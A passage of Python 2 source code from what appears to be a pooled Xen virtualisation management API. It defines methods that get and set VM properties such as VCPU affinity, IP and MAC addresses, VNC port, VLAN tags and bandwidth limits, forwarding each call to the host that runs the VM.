dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_cpu_qos())
#frank
def VM_get_network_qos(self, _, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_network_qos())
def VM_get_VCPUs_max(self, _, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's max VCPUs.
@param _: session of RPC.
@param vm_ref: uuid
@return: VCPUs num
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_VCPUs_max(_, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_VCPUs_max', vm_ref)
else:
return self._VM_get_VCPUs_max(_, vm_ref)
def _VM_get_VCPUs_max(self, _, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's max VCPUs.
@param _: session of RPC.
@param vm_ref: uuid
@return: VCPUs num
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.info['VCPUs_max'])
def VM_get_VCPUs_at_startup(self, _, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_todo()
def VM_get_VCPUs_CPU(self, session, vm_ref):
'''
@author: wuyuewen
        @summary: Get the CPUs each VCPU is bound to.
@param session: session of RPC.
@param vm_ref: uuid
@return: VCPUs-CPUs dict.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_VCPUs_CPU(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_VCPUs_CPU', vm_ref)
else:
return self._VM_get_VCPUs_CPU(session, vm_ref)
def _VM_get_VCPUs_CPU(self, session, vm_ref):
'''
@author: wuyuewen
        @summary: Internal method. Get the CPUs each VCPU is bound to.
@param session: session of RPC.
@param vm_ref: uuid
@return: VCPUs-CPUs dict.
@rtype: dict.
'''
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dominfo.getVCPUsCPU())
def VM_get_ip_addr(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's ip address.
        @precondition: VM-tools must be installed in the VM.
@param session: session of RPC.
@param vm_ref: uuid
@return: IPv4 address.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_ip_addr(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_ip_addr', vm_ref)
else:
return self._VM_get_ip_addr(session, vm_ref)
def _VM_get_ip_addr(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's ip address.
        @precondition: VM-tools must be installed in the VM.
@param session: session of RPC.
@param vm_ref: uuid
@return: IPv4 address.
@rtype: dict.
'''
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dominfo.getDomainIp())
def VM_get_MAC(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's MAC address.
@precondition: has a VIF device.
@param session: session of RPC.
@param vm_ref: uuid
@return: MAC address.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_MAC(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_MAC', vm_ref)
else:
return self._VM_get_MAC(session, vm_ref)
def _VM_get_MAC(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's MAC address.
@precondition: has a VIF device.
@param session: session of RPC.
@param vm_ref: uuid
@return: MAC address.
@rtype: dict.
'''
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dominfo.getDomainMAC())
def VM_get_vnc_location(self, session, vm_ref):
'''
@author: wuyuewen
        @summary: Get VM's VNC location.
@precondition: has a console device.
@param session: session of RPC.
@param vm_ref: uuid
@return: VNC location.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_vnc_location(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_vnc_location', vm_ref)
else:
return self._VM_get_vnc_location(session, vm_ref)
def _VM_get_vnc_location(self, session, vm_ref):
'''
@author: wuyuewen
        @summary: Internal method. Get VM's VNC location.
@precondition: has a console device.
@param session: session of RPC.
@param vm_ref: uuid
@return: VNC location.
@rtype: dict.
'''
        xendom = XendDomain.instance()
dom = xendom.get_vm_by_uuid(vm_ref)
# consoles = dom.get_consoles()
# vnc_location = "0"
# for console in consoles:
# location = xendom.get_dev_property_by_uuid('console', console, 'location')
# log.debug("vm %s console %s location %s" % (vm_ref, console, location))
# if location.find(".") != -1:
# vnc_location = location
vnc_location = dom.get_console_port()
log.debug('VM(%s) get vnc location (%s)' % (vm_ref, vnc_location))
return xen_api_success(vnc_location)
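    # Despite the name, the value returned above is the console (VNC) port
    # from dom.get_console_port(), e.g. '5902' (illustrative), rather than
    # a full host:port location; callers presumably combine it with the
    # host address themselves.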
# attributes (rw)
def VM_get_name_label(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's name label.
@param session: session of RPC.
@param vm_ref: uuid
@return: name label.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_name_label(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_name_label', vm_ref)
else:
return self._VM_get_name_label(session, vm_ref)
def _VM_get_name_label(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's name label.
@param session: session of RPC.
@param vm_ref: uuid
@return: name label.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.getName())
def VM_get_name_description(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's name description.
@param session: session of RPC.
@param vm_ref: uuid
@return: name description.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_name_description(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_name_description', vm_ref)
else:
return self._VM_get_name_description(session, vm_ref)
def _VM_get_name_description(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's name description.
@param session: session of RPC.
@param vm_ref: uuid
@return: name description.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.getNameDescription())
def VM_get_user_version(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_todo()
def VM_get_is_a_template(self, session, ref):
'''
@author: wuyuewen
        @summary: Get whether the VM is a template.
@param session: session of RPC.
@param ref: uuid
@return: True | False.
@rtype: dict.
@raise xen_api_error: key error
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_is_a_template(session, ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_is_a_template', ref)
else:
return self._VM_get_is_a_template(session, ref)
def _VM_get_is_a_template(self, session, ref):
'''
@author: wuyuewen
        @summary: Internal method. Get whether the VM is a template.
@param session: session of RPC.
@param ref: uuid
@return: True | False.
@rtype: dict.
@raise xen_api_error: key error
'''
log.debug('ref:%s' % ref)
try:
return xen_api_success(XendDomain.instance().get_vm_by_uuid(ref).info['is_a_template'])
except KeyError:
return xen_api_error(['key error', ref])
def VM_get_is_local_vm(self, session, ref):
'''
@author: wuyuewen
        @summary: Get whether the VM is a local VM (disk file on local storage, not shared).
@param session: session of RPC.
@param ref: uuid
@return: True | False.
@rtype: dict.
@raise xen_api_error: key error
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_is_local_vm(session, ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_is_local_vm', ref)
else:
return self._VM_get_is_local_vm(session, ref)
def _VM_get_is_local_vm(self, session, ref):
'''
@author: wuyuewen
        @summary: Internal method. Get whether the VM is a local VM (disk file on local storage, not shared).
@param session: session of RPC.
@param ref: uuid
@return: True | False.
@rtype: dict.
@raise xen_api_error: key error
'''
# log.debug('ref:%s' % ref)
try:
storage = self._get_BNStorageAPI_instance()
vdis = storage._VDI_get_by_vm(session, ref).get('Value')
if vdis:
for vdi_uuid in vdis:
vdi = storage._get_VDI(vdi_uuid)
if vdi:
sharable = vdi.sharable
if not sharable:
return xen_api_success(not sharable)
else:
log.exception('failed to get vdi by vdi_uuid: %s' % vdi_uuid)
return xen_api_success(True)
# return xen_api_error(['failed to get vdi by vdi_uuid', vdi_uuid])
return xen_api_success(not sharable)
else:
log.exception('failed to get vdi by vm: %s' % ref)
return xen_api_success(False)
# return xen_api_error(['failed to get vdi by vm',ref])
except KeyError:
return xen_api_error(['key error', ref])
except VDIError:
return xen_api_success(False)
# # get inner ip of a VM
# def VM_get_inner_ip(self, session, vm_ref):
# ip_map = self.VM_get_ip_map(session, vm_ref).get('Value')
# mac2ip_list = {}
# for mac, ipmap in ip_map.items():
# inner_ip = ipmap.split('@')[0]
# mac2ip_list[mac] = inner_ip
# return xen_api_success(mac2ip_list)
# #Get mapping intranet ip address to outer net ip address.
# def VM_get_ip_map(self, session, vm_ref):
# if BNPoolAPI._isMaster:
# host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
# if cmp(host_ref, XendNode.instance().uuid) == 0:
# return self._VM_get_ip_map(session, vm_ref)
# else:
# host_ip = BNPoolAPI.get_host_ip(host_ref)
# return xen_rpc_call(host_ip, 'VM_get_ip_map', vm_ref)
# else:
# return self._VM_get_ip_map(session, vm_ref)
#
# def _VM_get_ip_map(self, session, vm_ref):
# dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
# return xen_api_success(dom.get_ip_map())
def VM_get_auto_power_on(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('auto_power_on', session, vm_ref)
def VM_get_memory_dynamic_max(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's memory dynamic max.
@param session: session of RPC.
@param vm_ref: uuid
@return: memory dynamic max(Bytes).
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_memory_dynamic_max(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_get_memory_dynamic_max', vm_ref)
else:
return self._VM_get_memory_dynamic_max(session, vm_ref)
def _VM_get_memory_dynamic_max(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's memory dynamic max.
@param session: session of RPC.
@param vm_ref: uuid
@return: memory dynamic max(Bytes).
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_memory_dynamic_max())
def VM_get_memory_dynamic_min(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's memory dynamic min.
@param session: session of RPC.
@param vm_ref: uuid
@return: memory dynamic min(Bytes).
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_memory_dynamic_min(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_get_memory_dynamic_min', vm_ref)
else:
return self._VM_get_memory_dynamic_min(session, vm_ref)
def _VM_get_memory_dynamic_min(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's memory dynamic min.
@param session: session of RPC.
@param vm_ref: uuid
@return: memory dynamic min(Bytes).
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_memory_dynamic_min())
def VM_get_VCPUs_params(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_vcpus_params())
def VM_get_actions_after_shutdown(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_on_shutdown())
def VM_get_actions_after_reboot(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_on_reboot())
def VM_get_actions_after_suspend(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_on_suspend())
def VM_get_actions_after_crash(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_on_crash())
def VM_get_PV_bootloader(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('PV_bootloader', session, vm_ref)
def VM_get_PV_kernel(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('PV_kernel', session, vm_ref)
def VM_get_PV_ramdisk(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('PV_ramdisk', session, vm_ref)
def VM_get_PV_args(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('PV_args', session, vm_ref)
def VM_get_PV_bootloader_args(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('PV_bootloader_args', session, vm_ref)
def VM_get_HVM_boot_policy(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('HVM_boot_policy', session, vm_ref)
def VM_get_HVM_boot_params(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('HVM_boot_params', session, vm_ref)
def VM_get_platform(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_platform())
def VM_get_PCI_bus(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return dom.get_pci_bus()
def VM_get_VCPUs_affinity(self, session, vm_ref):
'''
@author: wuyuewen
        @summary: Get the VM's VCPU-to-CPU affinity.
@param session: session of RPC.
@param vm_ref: uuid
@return: dict of CPU affinity.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
            if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_VCPUs_affinity(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_VCPUs_affinity', vm_ref)
else:
return self._VM_get_VCPUs_affinity(session, vm_ref)
def _VM_get_VCPUs_affinity(self, session, vm_ref):
'''
@author: wuyuewen
        @summary: Internal method. Get the VM's VCPU-to-CPU affinity.
@param session: session of RPC.
@param vm_ref: uuid
@return: dict of CPU affinity.
@rtype: dict.
'''
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dominfo.getVCPUsAffinity())
def VM_set_VCPUs_affinity(self, session, vm_ref, vcpu, cpumap):
'''
@author: wuyuewen
        @summary: Set the VM's VCPU CPU affinity; the VCPU may run on any of these CPUs.
@precondition: VM not running.
@param session: session of RPC.
@param vm_ref: uuid
@param vcpu: number of VCPU, if VM has 2 VCPU, then VCPU number is 0 or 1.
@param cpumap: numbers of CPUs, e.g. "0,2,4,8" means CPUs number 0,2,4,8
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
            if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_VCPUs_affinity(session, vm_ref, vcpu, cpumap)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_VCPUs_affinity', vm_ref, vcpu, cpumap)
else:
return self._VM_set_VCPUs_affinity(session, vm_ref, vcpu, cpumap)
def _VM_set_VCPUs_affinity(self, session, vm_ref, vcpu, cpumap):
'''
@author: wuyuewen
        @summary: Internal method. Set VM's VCPU affinity; the VCPU may only run on the given CPUs.
        @precondition: VM not running.
        @param session: session of RPC.
        @param vm_ref: uuid
        @param vcpu: VCPU index; if the VM has 2 VCPUs, the index is 0 or 1.
        @param cpumap: comma-separated CPU numbers, e.g. "0,2,4,8" means CPUs 0, 2, 4 and 8.
@return: True | False.
@rtype: dict.
'''
        dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
        if not dominfo:
            raise XendInvalidDomain(str(vm_ref))
        domid = dominfo.getDomid()
        vcpu = 'cpumap%d' % int(vcpu)
        if not domid or cmp(domid, -1) == 0:
self.VM_add_to_VCPUs_params(session, vm_ref, vcpu, cpumap)
else:
self.VM_add_to_VCPUs_params_live(session, vm_ref, vcpu, cpumap)
# dominfo.setVCPUsAffinity(vcpu, cpumap)
return xen_api_success_void()
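    # Example (illustrative; assumes 'api' is an instance of this class and
    # 'session'/'vm_ref' are a valid RPC session and VM uuid): pin VCPU 1 so
    # it may only run on physical CPUs 0, 2 and 4:
    #
    #     api.VM_set_VCPUs_affinity(session, vm_ref, 1, "0,2,4")
    #
    # For a stopped VM this only writes 'cpumap1' into vcpus_params; for a
    # running VM the pinning is also applied live via domain_pincpu.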
def VM_set_PCI_bus(self, session, vm_ref, val):
'''
@deprecated: not used
'''
return self.VM_set('PCI_bus', session, vm_ref, val)
def VM_get_other_config(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's other config.
@param session: session of RPC.
@param vm_ref: uuid
@return: other config field.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_other_config(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_other_config', vm_ref)
else:
return self._VM_get_other_config(session, vm_ref)
#
# host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
# if cmp(host_ref, XendNode.instance().uuid) == 0:
# return self.VM_get('other_config', session, vm_ref)
# else:
# log.debug("get other config")
# host_ip = BNPoolAPI._host_structs[host_ref]['ip']
# return xen_rpc_call(host_ip, "VM_get_other_config", vm_ref)
# add by wufan 20131016
def _VM_get_other_config(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's other config.
@param session: session of RPC.
@param vm_ref: uuid
@return: other config field.
@rtype: dict.
'''
other_config = self.VM_get('other_config', session, vm_ref).get('Value')
#log.debug('_VM_get_other_config: type%s value%s' % (type(other_config), other_config))
#if other_config :
# tag_list = other_config.get('tag',{})
# if isinstance(tag_list, str):
# self._VM_convert_other_config(session, vm_ref)
# other_config = self.VM_get('other_config', session, vm_ref).get('Value')
return xen_api_success(other_config)
# add by wufan
def _VM_convert_other_config(self, session, vm_ref):
'''
@deprecated: not used
'''
        OTHER_CFG_DICT_KEYS = ['tag', 'rate', 'burst']
convert_other_config = {}
other_config = self.VM_get('other_config', session, vm_ref).get('Value')
#log.debug('_VM_get_other_config: type%s value%s' % (type(other_config), other_config))
if other_config and isinstance(other_config, dict):
for key, value in other_config.items():
                if key in OTHER_CFG_DICT_KEYS and not isinstance(value, dict):
value = eval(value)
if isinstance(value, dict):
convert_other_config.setdefault(key,{})
for k, v in value.items():
convert_other_config[key][k] = v
else:
convert_other_config[key] = value
self._VM_set_other_config(session, vm_ref, convert_other_config)
log.debug('_VM_convert_other_config: type%s value%s' % (type(convert_other_config), convert_other_config))
return xen_api_success_void()
def VM_get_tags(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_tags(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_tags', vm_ref)
else:
return self._VM_get_tags(session, vm_ref)
def _VM_get_tags(self, session, vm_ref):
'''
@deprecated: not used
'''
try:
return self.VM_get('tags', session, vm_ref)
except Exception, exn:
log.exception(exn)
return xen_api_error(exn)
def VM_get_all_tag(self, session, vm_ref, tag_type):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_all_tag(session, vm_ref, tag_type)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_all_tag', vm_ref, tag_type)
else:
return self._VM_get_all_tag(session, vm_ref, tag_type)
def _VM_get_all_tag(self, session, vm_ref, tag_type):
'''
@deprecated: not used
'''
tag_list = {}
try:
other_config = self._VM_get_other_config(session, vm_ref).get('Value')
#log.debug('other_config: %s', other_config)
if other_config:
tag_list = other_config.get(tag_type,{})
log.debug('list:%s' % tag_list)
return xen_api_success(tag_list)
except Exception, exn:
log.exception(exn)
return xen_api_success(tag_list)
def VM_get_tag(self, session, vm_ref, vif_ref):
'''
@author: wuyuewen
        @summary: Get VIF's tag (VLAN-ID); this attribute is stored in the VM's other_config field.
        @param session: session of RPC.
        @param vm_ref: uuid
        @param vif_ref: VIF uuid
        @return: VIF's tag number (VLAN-ID); the default is -1 (VLAN not used).
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_tag(session, vm_ref, vif_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_tag', vm_ref, vif_ref)
else:
return self._VM_get_tag(session, vm_ref, vif_ref)
# original:wuyuewen
#def _VM_get_tag(self, session, vm_ref):
# try:
# other_config = self._VM_get_other_config(session, vm_ref).get('Value')
# tag = "-1"
# if other_config:
# tag = other_config.get('tag', "-1")
# return xen_api_success(tag)
# except Exception, exn:
# log.exception(exn)
# return xen_api_success(tag)
# add by wufan read from VM's other_config
def _VM_get_tag(self, session, vm_ref, vif_ref):
'''
@author: wuyuewen
        @summary: Internal method. Get VIF's tag (VLAN-ID); this attribute is stored in the VM's other_config field.
        @param session: session of RPC.
        @param vm_ref: uuid
        @param vif_ref: VIF uuid
        @return: VIF's tag number (VLAN-ID); the default is -1 (VLAN not used).
@rtype: dict.
'''
tag = '-1'
eth_num = '-1'
try:
other_config = self._VM_get_other_config(session, vm_ref).get('Value')
device = self.VIF_get_device(session, vif_ref).get('Value')
if device != '' and device.startswith('eth'):
eth_num = device[3:]
if other_config:
tag_list = other_config.get('tag',{})
#log.debug('tag_list type:%s' % type(tag_list))
tag = tag_list.get(eth_num,'-1')
#log.debug('_VM_get_tag:%s' % tag)
return xen_api_success(tag)
except Exception, exn:
log.exception(exn)
return xen_api_success(tag)
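    # The 'tag' entry of other_config maps an interface number to its VLAN-ID,
    # e.g. {'tag': {'0': '100', '1': '-1'}} puts eth0 on VLAN 100 and leaves
    # eth1 untagged. Example lookup (illustrative; 'api' as above):
    #
    #     tag = api.VM_get_tag(session, vm_ref, vif_ref).get('Value')  # e.g. '100'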
def VM_get_rate(self, session, vm_ref, param_type, vif_ref):
'''
@author: wuyuewen
        @summary: Get VIF's rate or burst limit enforced by OVS;
                these attributes are stored in the VM's other_config field.
        @param session: session of RPC.
        @param vm_ref: uuid
        @param param_type: 'rate' or 'burst'; rate is the bandwidth limit (kbps) of the
                VIF port enforced by OVS, burst (kbps) is the permitted burst above that rate.
        @param vif_ref: VIF uuid
        @return: VIF's rate (kbps).
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_rate(session, vm_ref, param_type, vif_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_rate', vm_ref, param_type, vif_ref)
else:
return self._VM_get_rate(session, vm_ref, param_type, vif_ref)
def _VM_get_rate(self, session, vm_ref, param_type, vif_ref):
'''
@author: wuyuewen
        @summary: Internal method. Get VIF's rate or burst limit enforced by OVS;
                these attributes are stored in the VM's other_config field.
        @param session: session of RPC.
        @param vm_ref: uuid
        @param param_type: 'rate' or 'burst'; rate is the bandwidth limit (kbps) of the
                VIF port enforced by OVS, burst (kbps) is the permitted burst above that rate.
        @param vif_ref: VIF uuid
        @return: VIF's rate (kbps).
@rtype: dict.
'''
rate = '-1'
eth_num = '-1'
try:
other_config = self._VM_get_other_config(session, vm_ref).get('Value')
device = self.VIF_get_device(session, vif_ref).get('Value')
#log.debug('>>>>>>>>>>>>device')
#log.debug(device)
eth_num = ''
if device != '' and device.startswith('eth'):
eth_num = device[3:]
            elif not device:
                vif_refs = self._VM_get_VIFs(session, vm_ref).get('Value')
                log.debug('vif_refs %s' % vif_refs)
                try:
                    # fall back to the VIF's position in the VM's VIF list
                    eth_num = str(vif_refs.index(vif_ref))
                except:
                    eth_num = ''
log.debug('eth_num %s' % eth_num)
if other_config and eth_num != '':
rate_list = other_config.get(param_type,{})
log.debug('rate_list %s' % rate_list)
rate = rate_list.get(eth_num,'-1')
return xen_api_success(rate)
except Exception, exn:
log.exception(exn)
return xen_api_success(rate)
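    # 'rate' and 'burst' are stored the same way as 'tag': a dict keyed by
    # interface number, e.g. {'rate': {'0': '1000'}} caps eth0 at 1000 kbps.
    # Example (illustrative; 'api' as above):
    #
    #     rate = api.VM_get_rate(session, vm_ref, 'rate', vif_ref).get('Value')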
def VM_get_domid(self, _, ref):
'''
@author: wuyuewen
@summary: Get VM's id.
@precondition: VM is running.
@param _: session of RPC.
@param ref: uuid
@return: VM's id.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_domid(_, ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_domid', ref)
else:
return self._VM_get_domid(_, ref)
def _VM_get_domid(self, _, ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's id.
@precondition: VM is running.
@param _: session of RPC.
@param ref: uuid
@return: VM's id.
@rtype: dict.
'''
domid = XendDomain.instance().get_vm_by_uuid(ref).getDomid()
return xen_api_success(domid is None and -1 or domid)
def VM_get_cpu_pool(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
pool_ref = XendCPUPool.query_pool_ref(dom.get_cpu_pool())
return xen_api_success(pool_ref)
def VM_set_pool_name(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('pool_name', session, vm_ref, value)
def VM_get_is_control_domain(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Check the VM is dom0 or not.
@param session: session of RPC.
@param vm_ref: uuid
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_is_control_domain(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_is_control_domain", vm_ref)
else:
return self._VM_get_is_control_domain(session, vm_ref)
def _VM_get_is_control_domain(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Check the VM is dom0 or not.
@param session: session of RPC.
@param vm_ref: uuid
@return: True | False.
@rtype: dict.
'''
xd = XendDomain.instance()
return xen_api_success(xd.get_vm_by_uuid(vm_ref) == xd.privilegedDomain())
def VM_get_VIF_record(self, session, vm_ref, vif_ref):
'''
@author: wuyuewen
        @summary: Get a VIF record; this method is used in place of VIF_get_record() in a Pool.
@param session: session of RPC.
@param vm_ref: uuid
@param vif_ref: VIF uuid
@return: VIF record struct.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self.VIF_get_record(session, vif_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VIF_get_record", vif_ref)
else:
return self.VIF_get_record(session, vif_ref)
def VM_get_network_record(self, session, vm_ref, vif):
'''
@author: wuyuewen
        @summary: Get a network record; this method is used in place of network_get_record() in a Pool.
@param session: session of RPC.
@param vm_ref: uuid
@param vif: VIF uuid
@return: network record struct.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
xenapi = self._get_XendAPI_instance()
bridge = self._VIF_get(vif, "bridge").get('Value')
list_network = xenapi.network_get_by_name_label(session, bridge).get('Value')
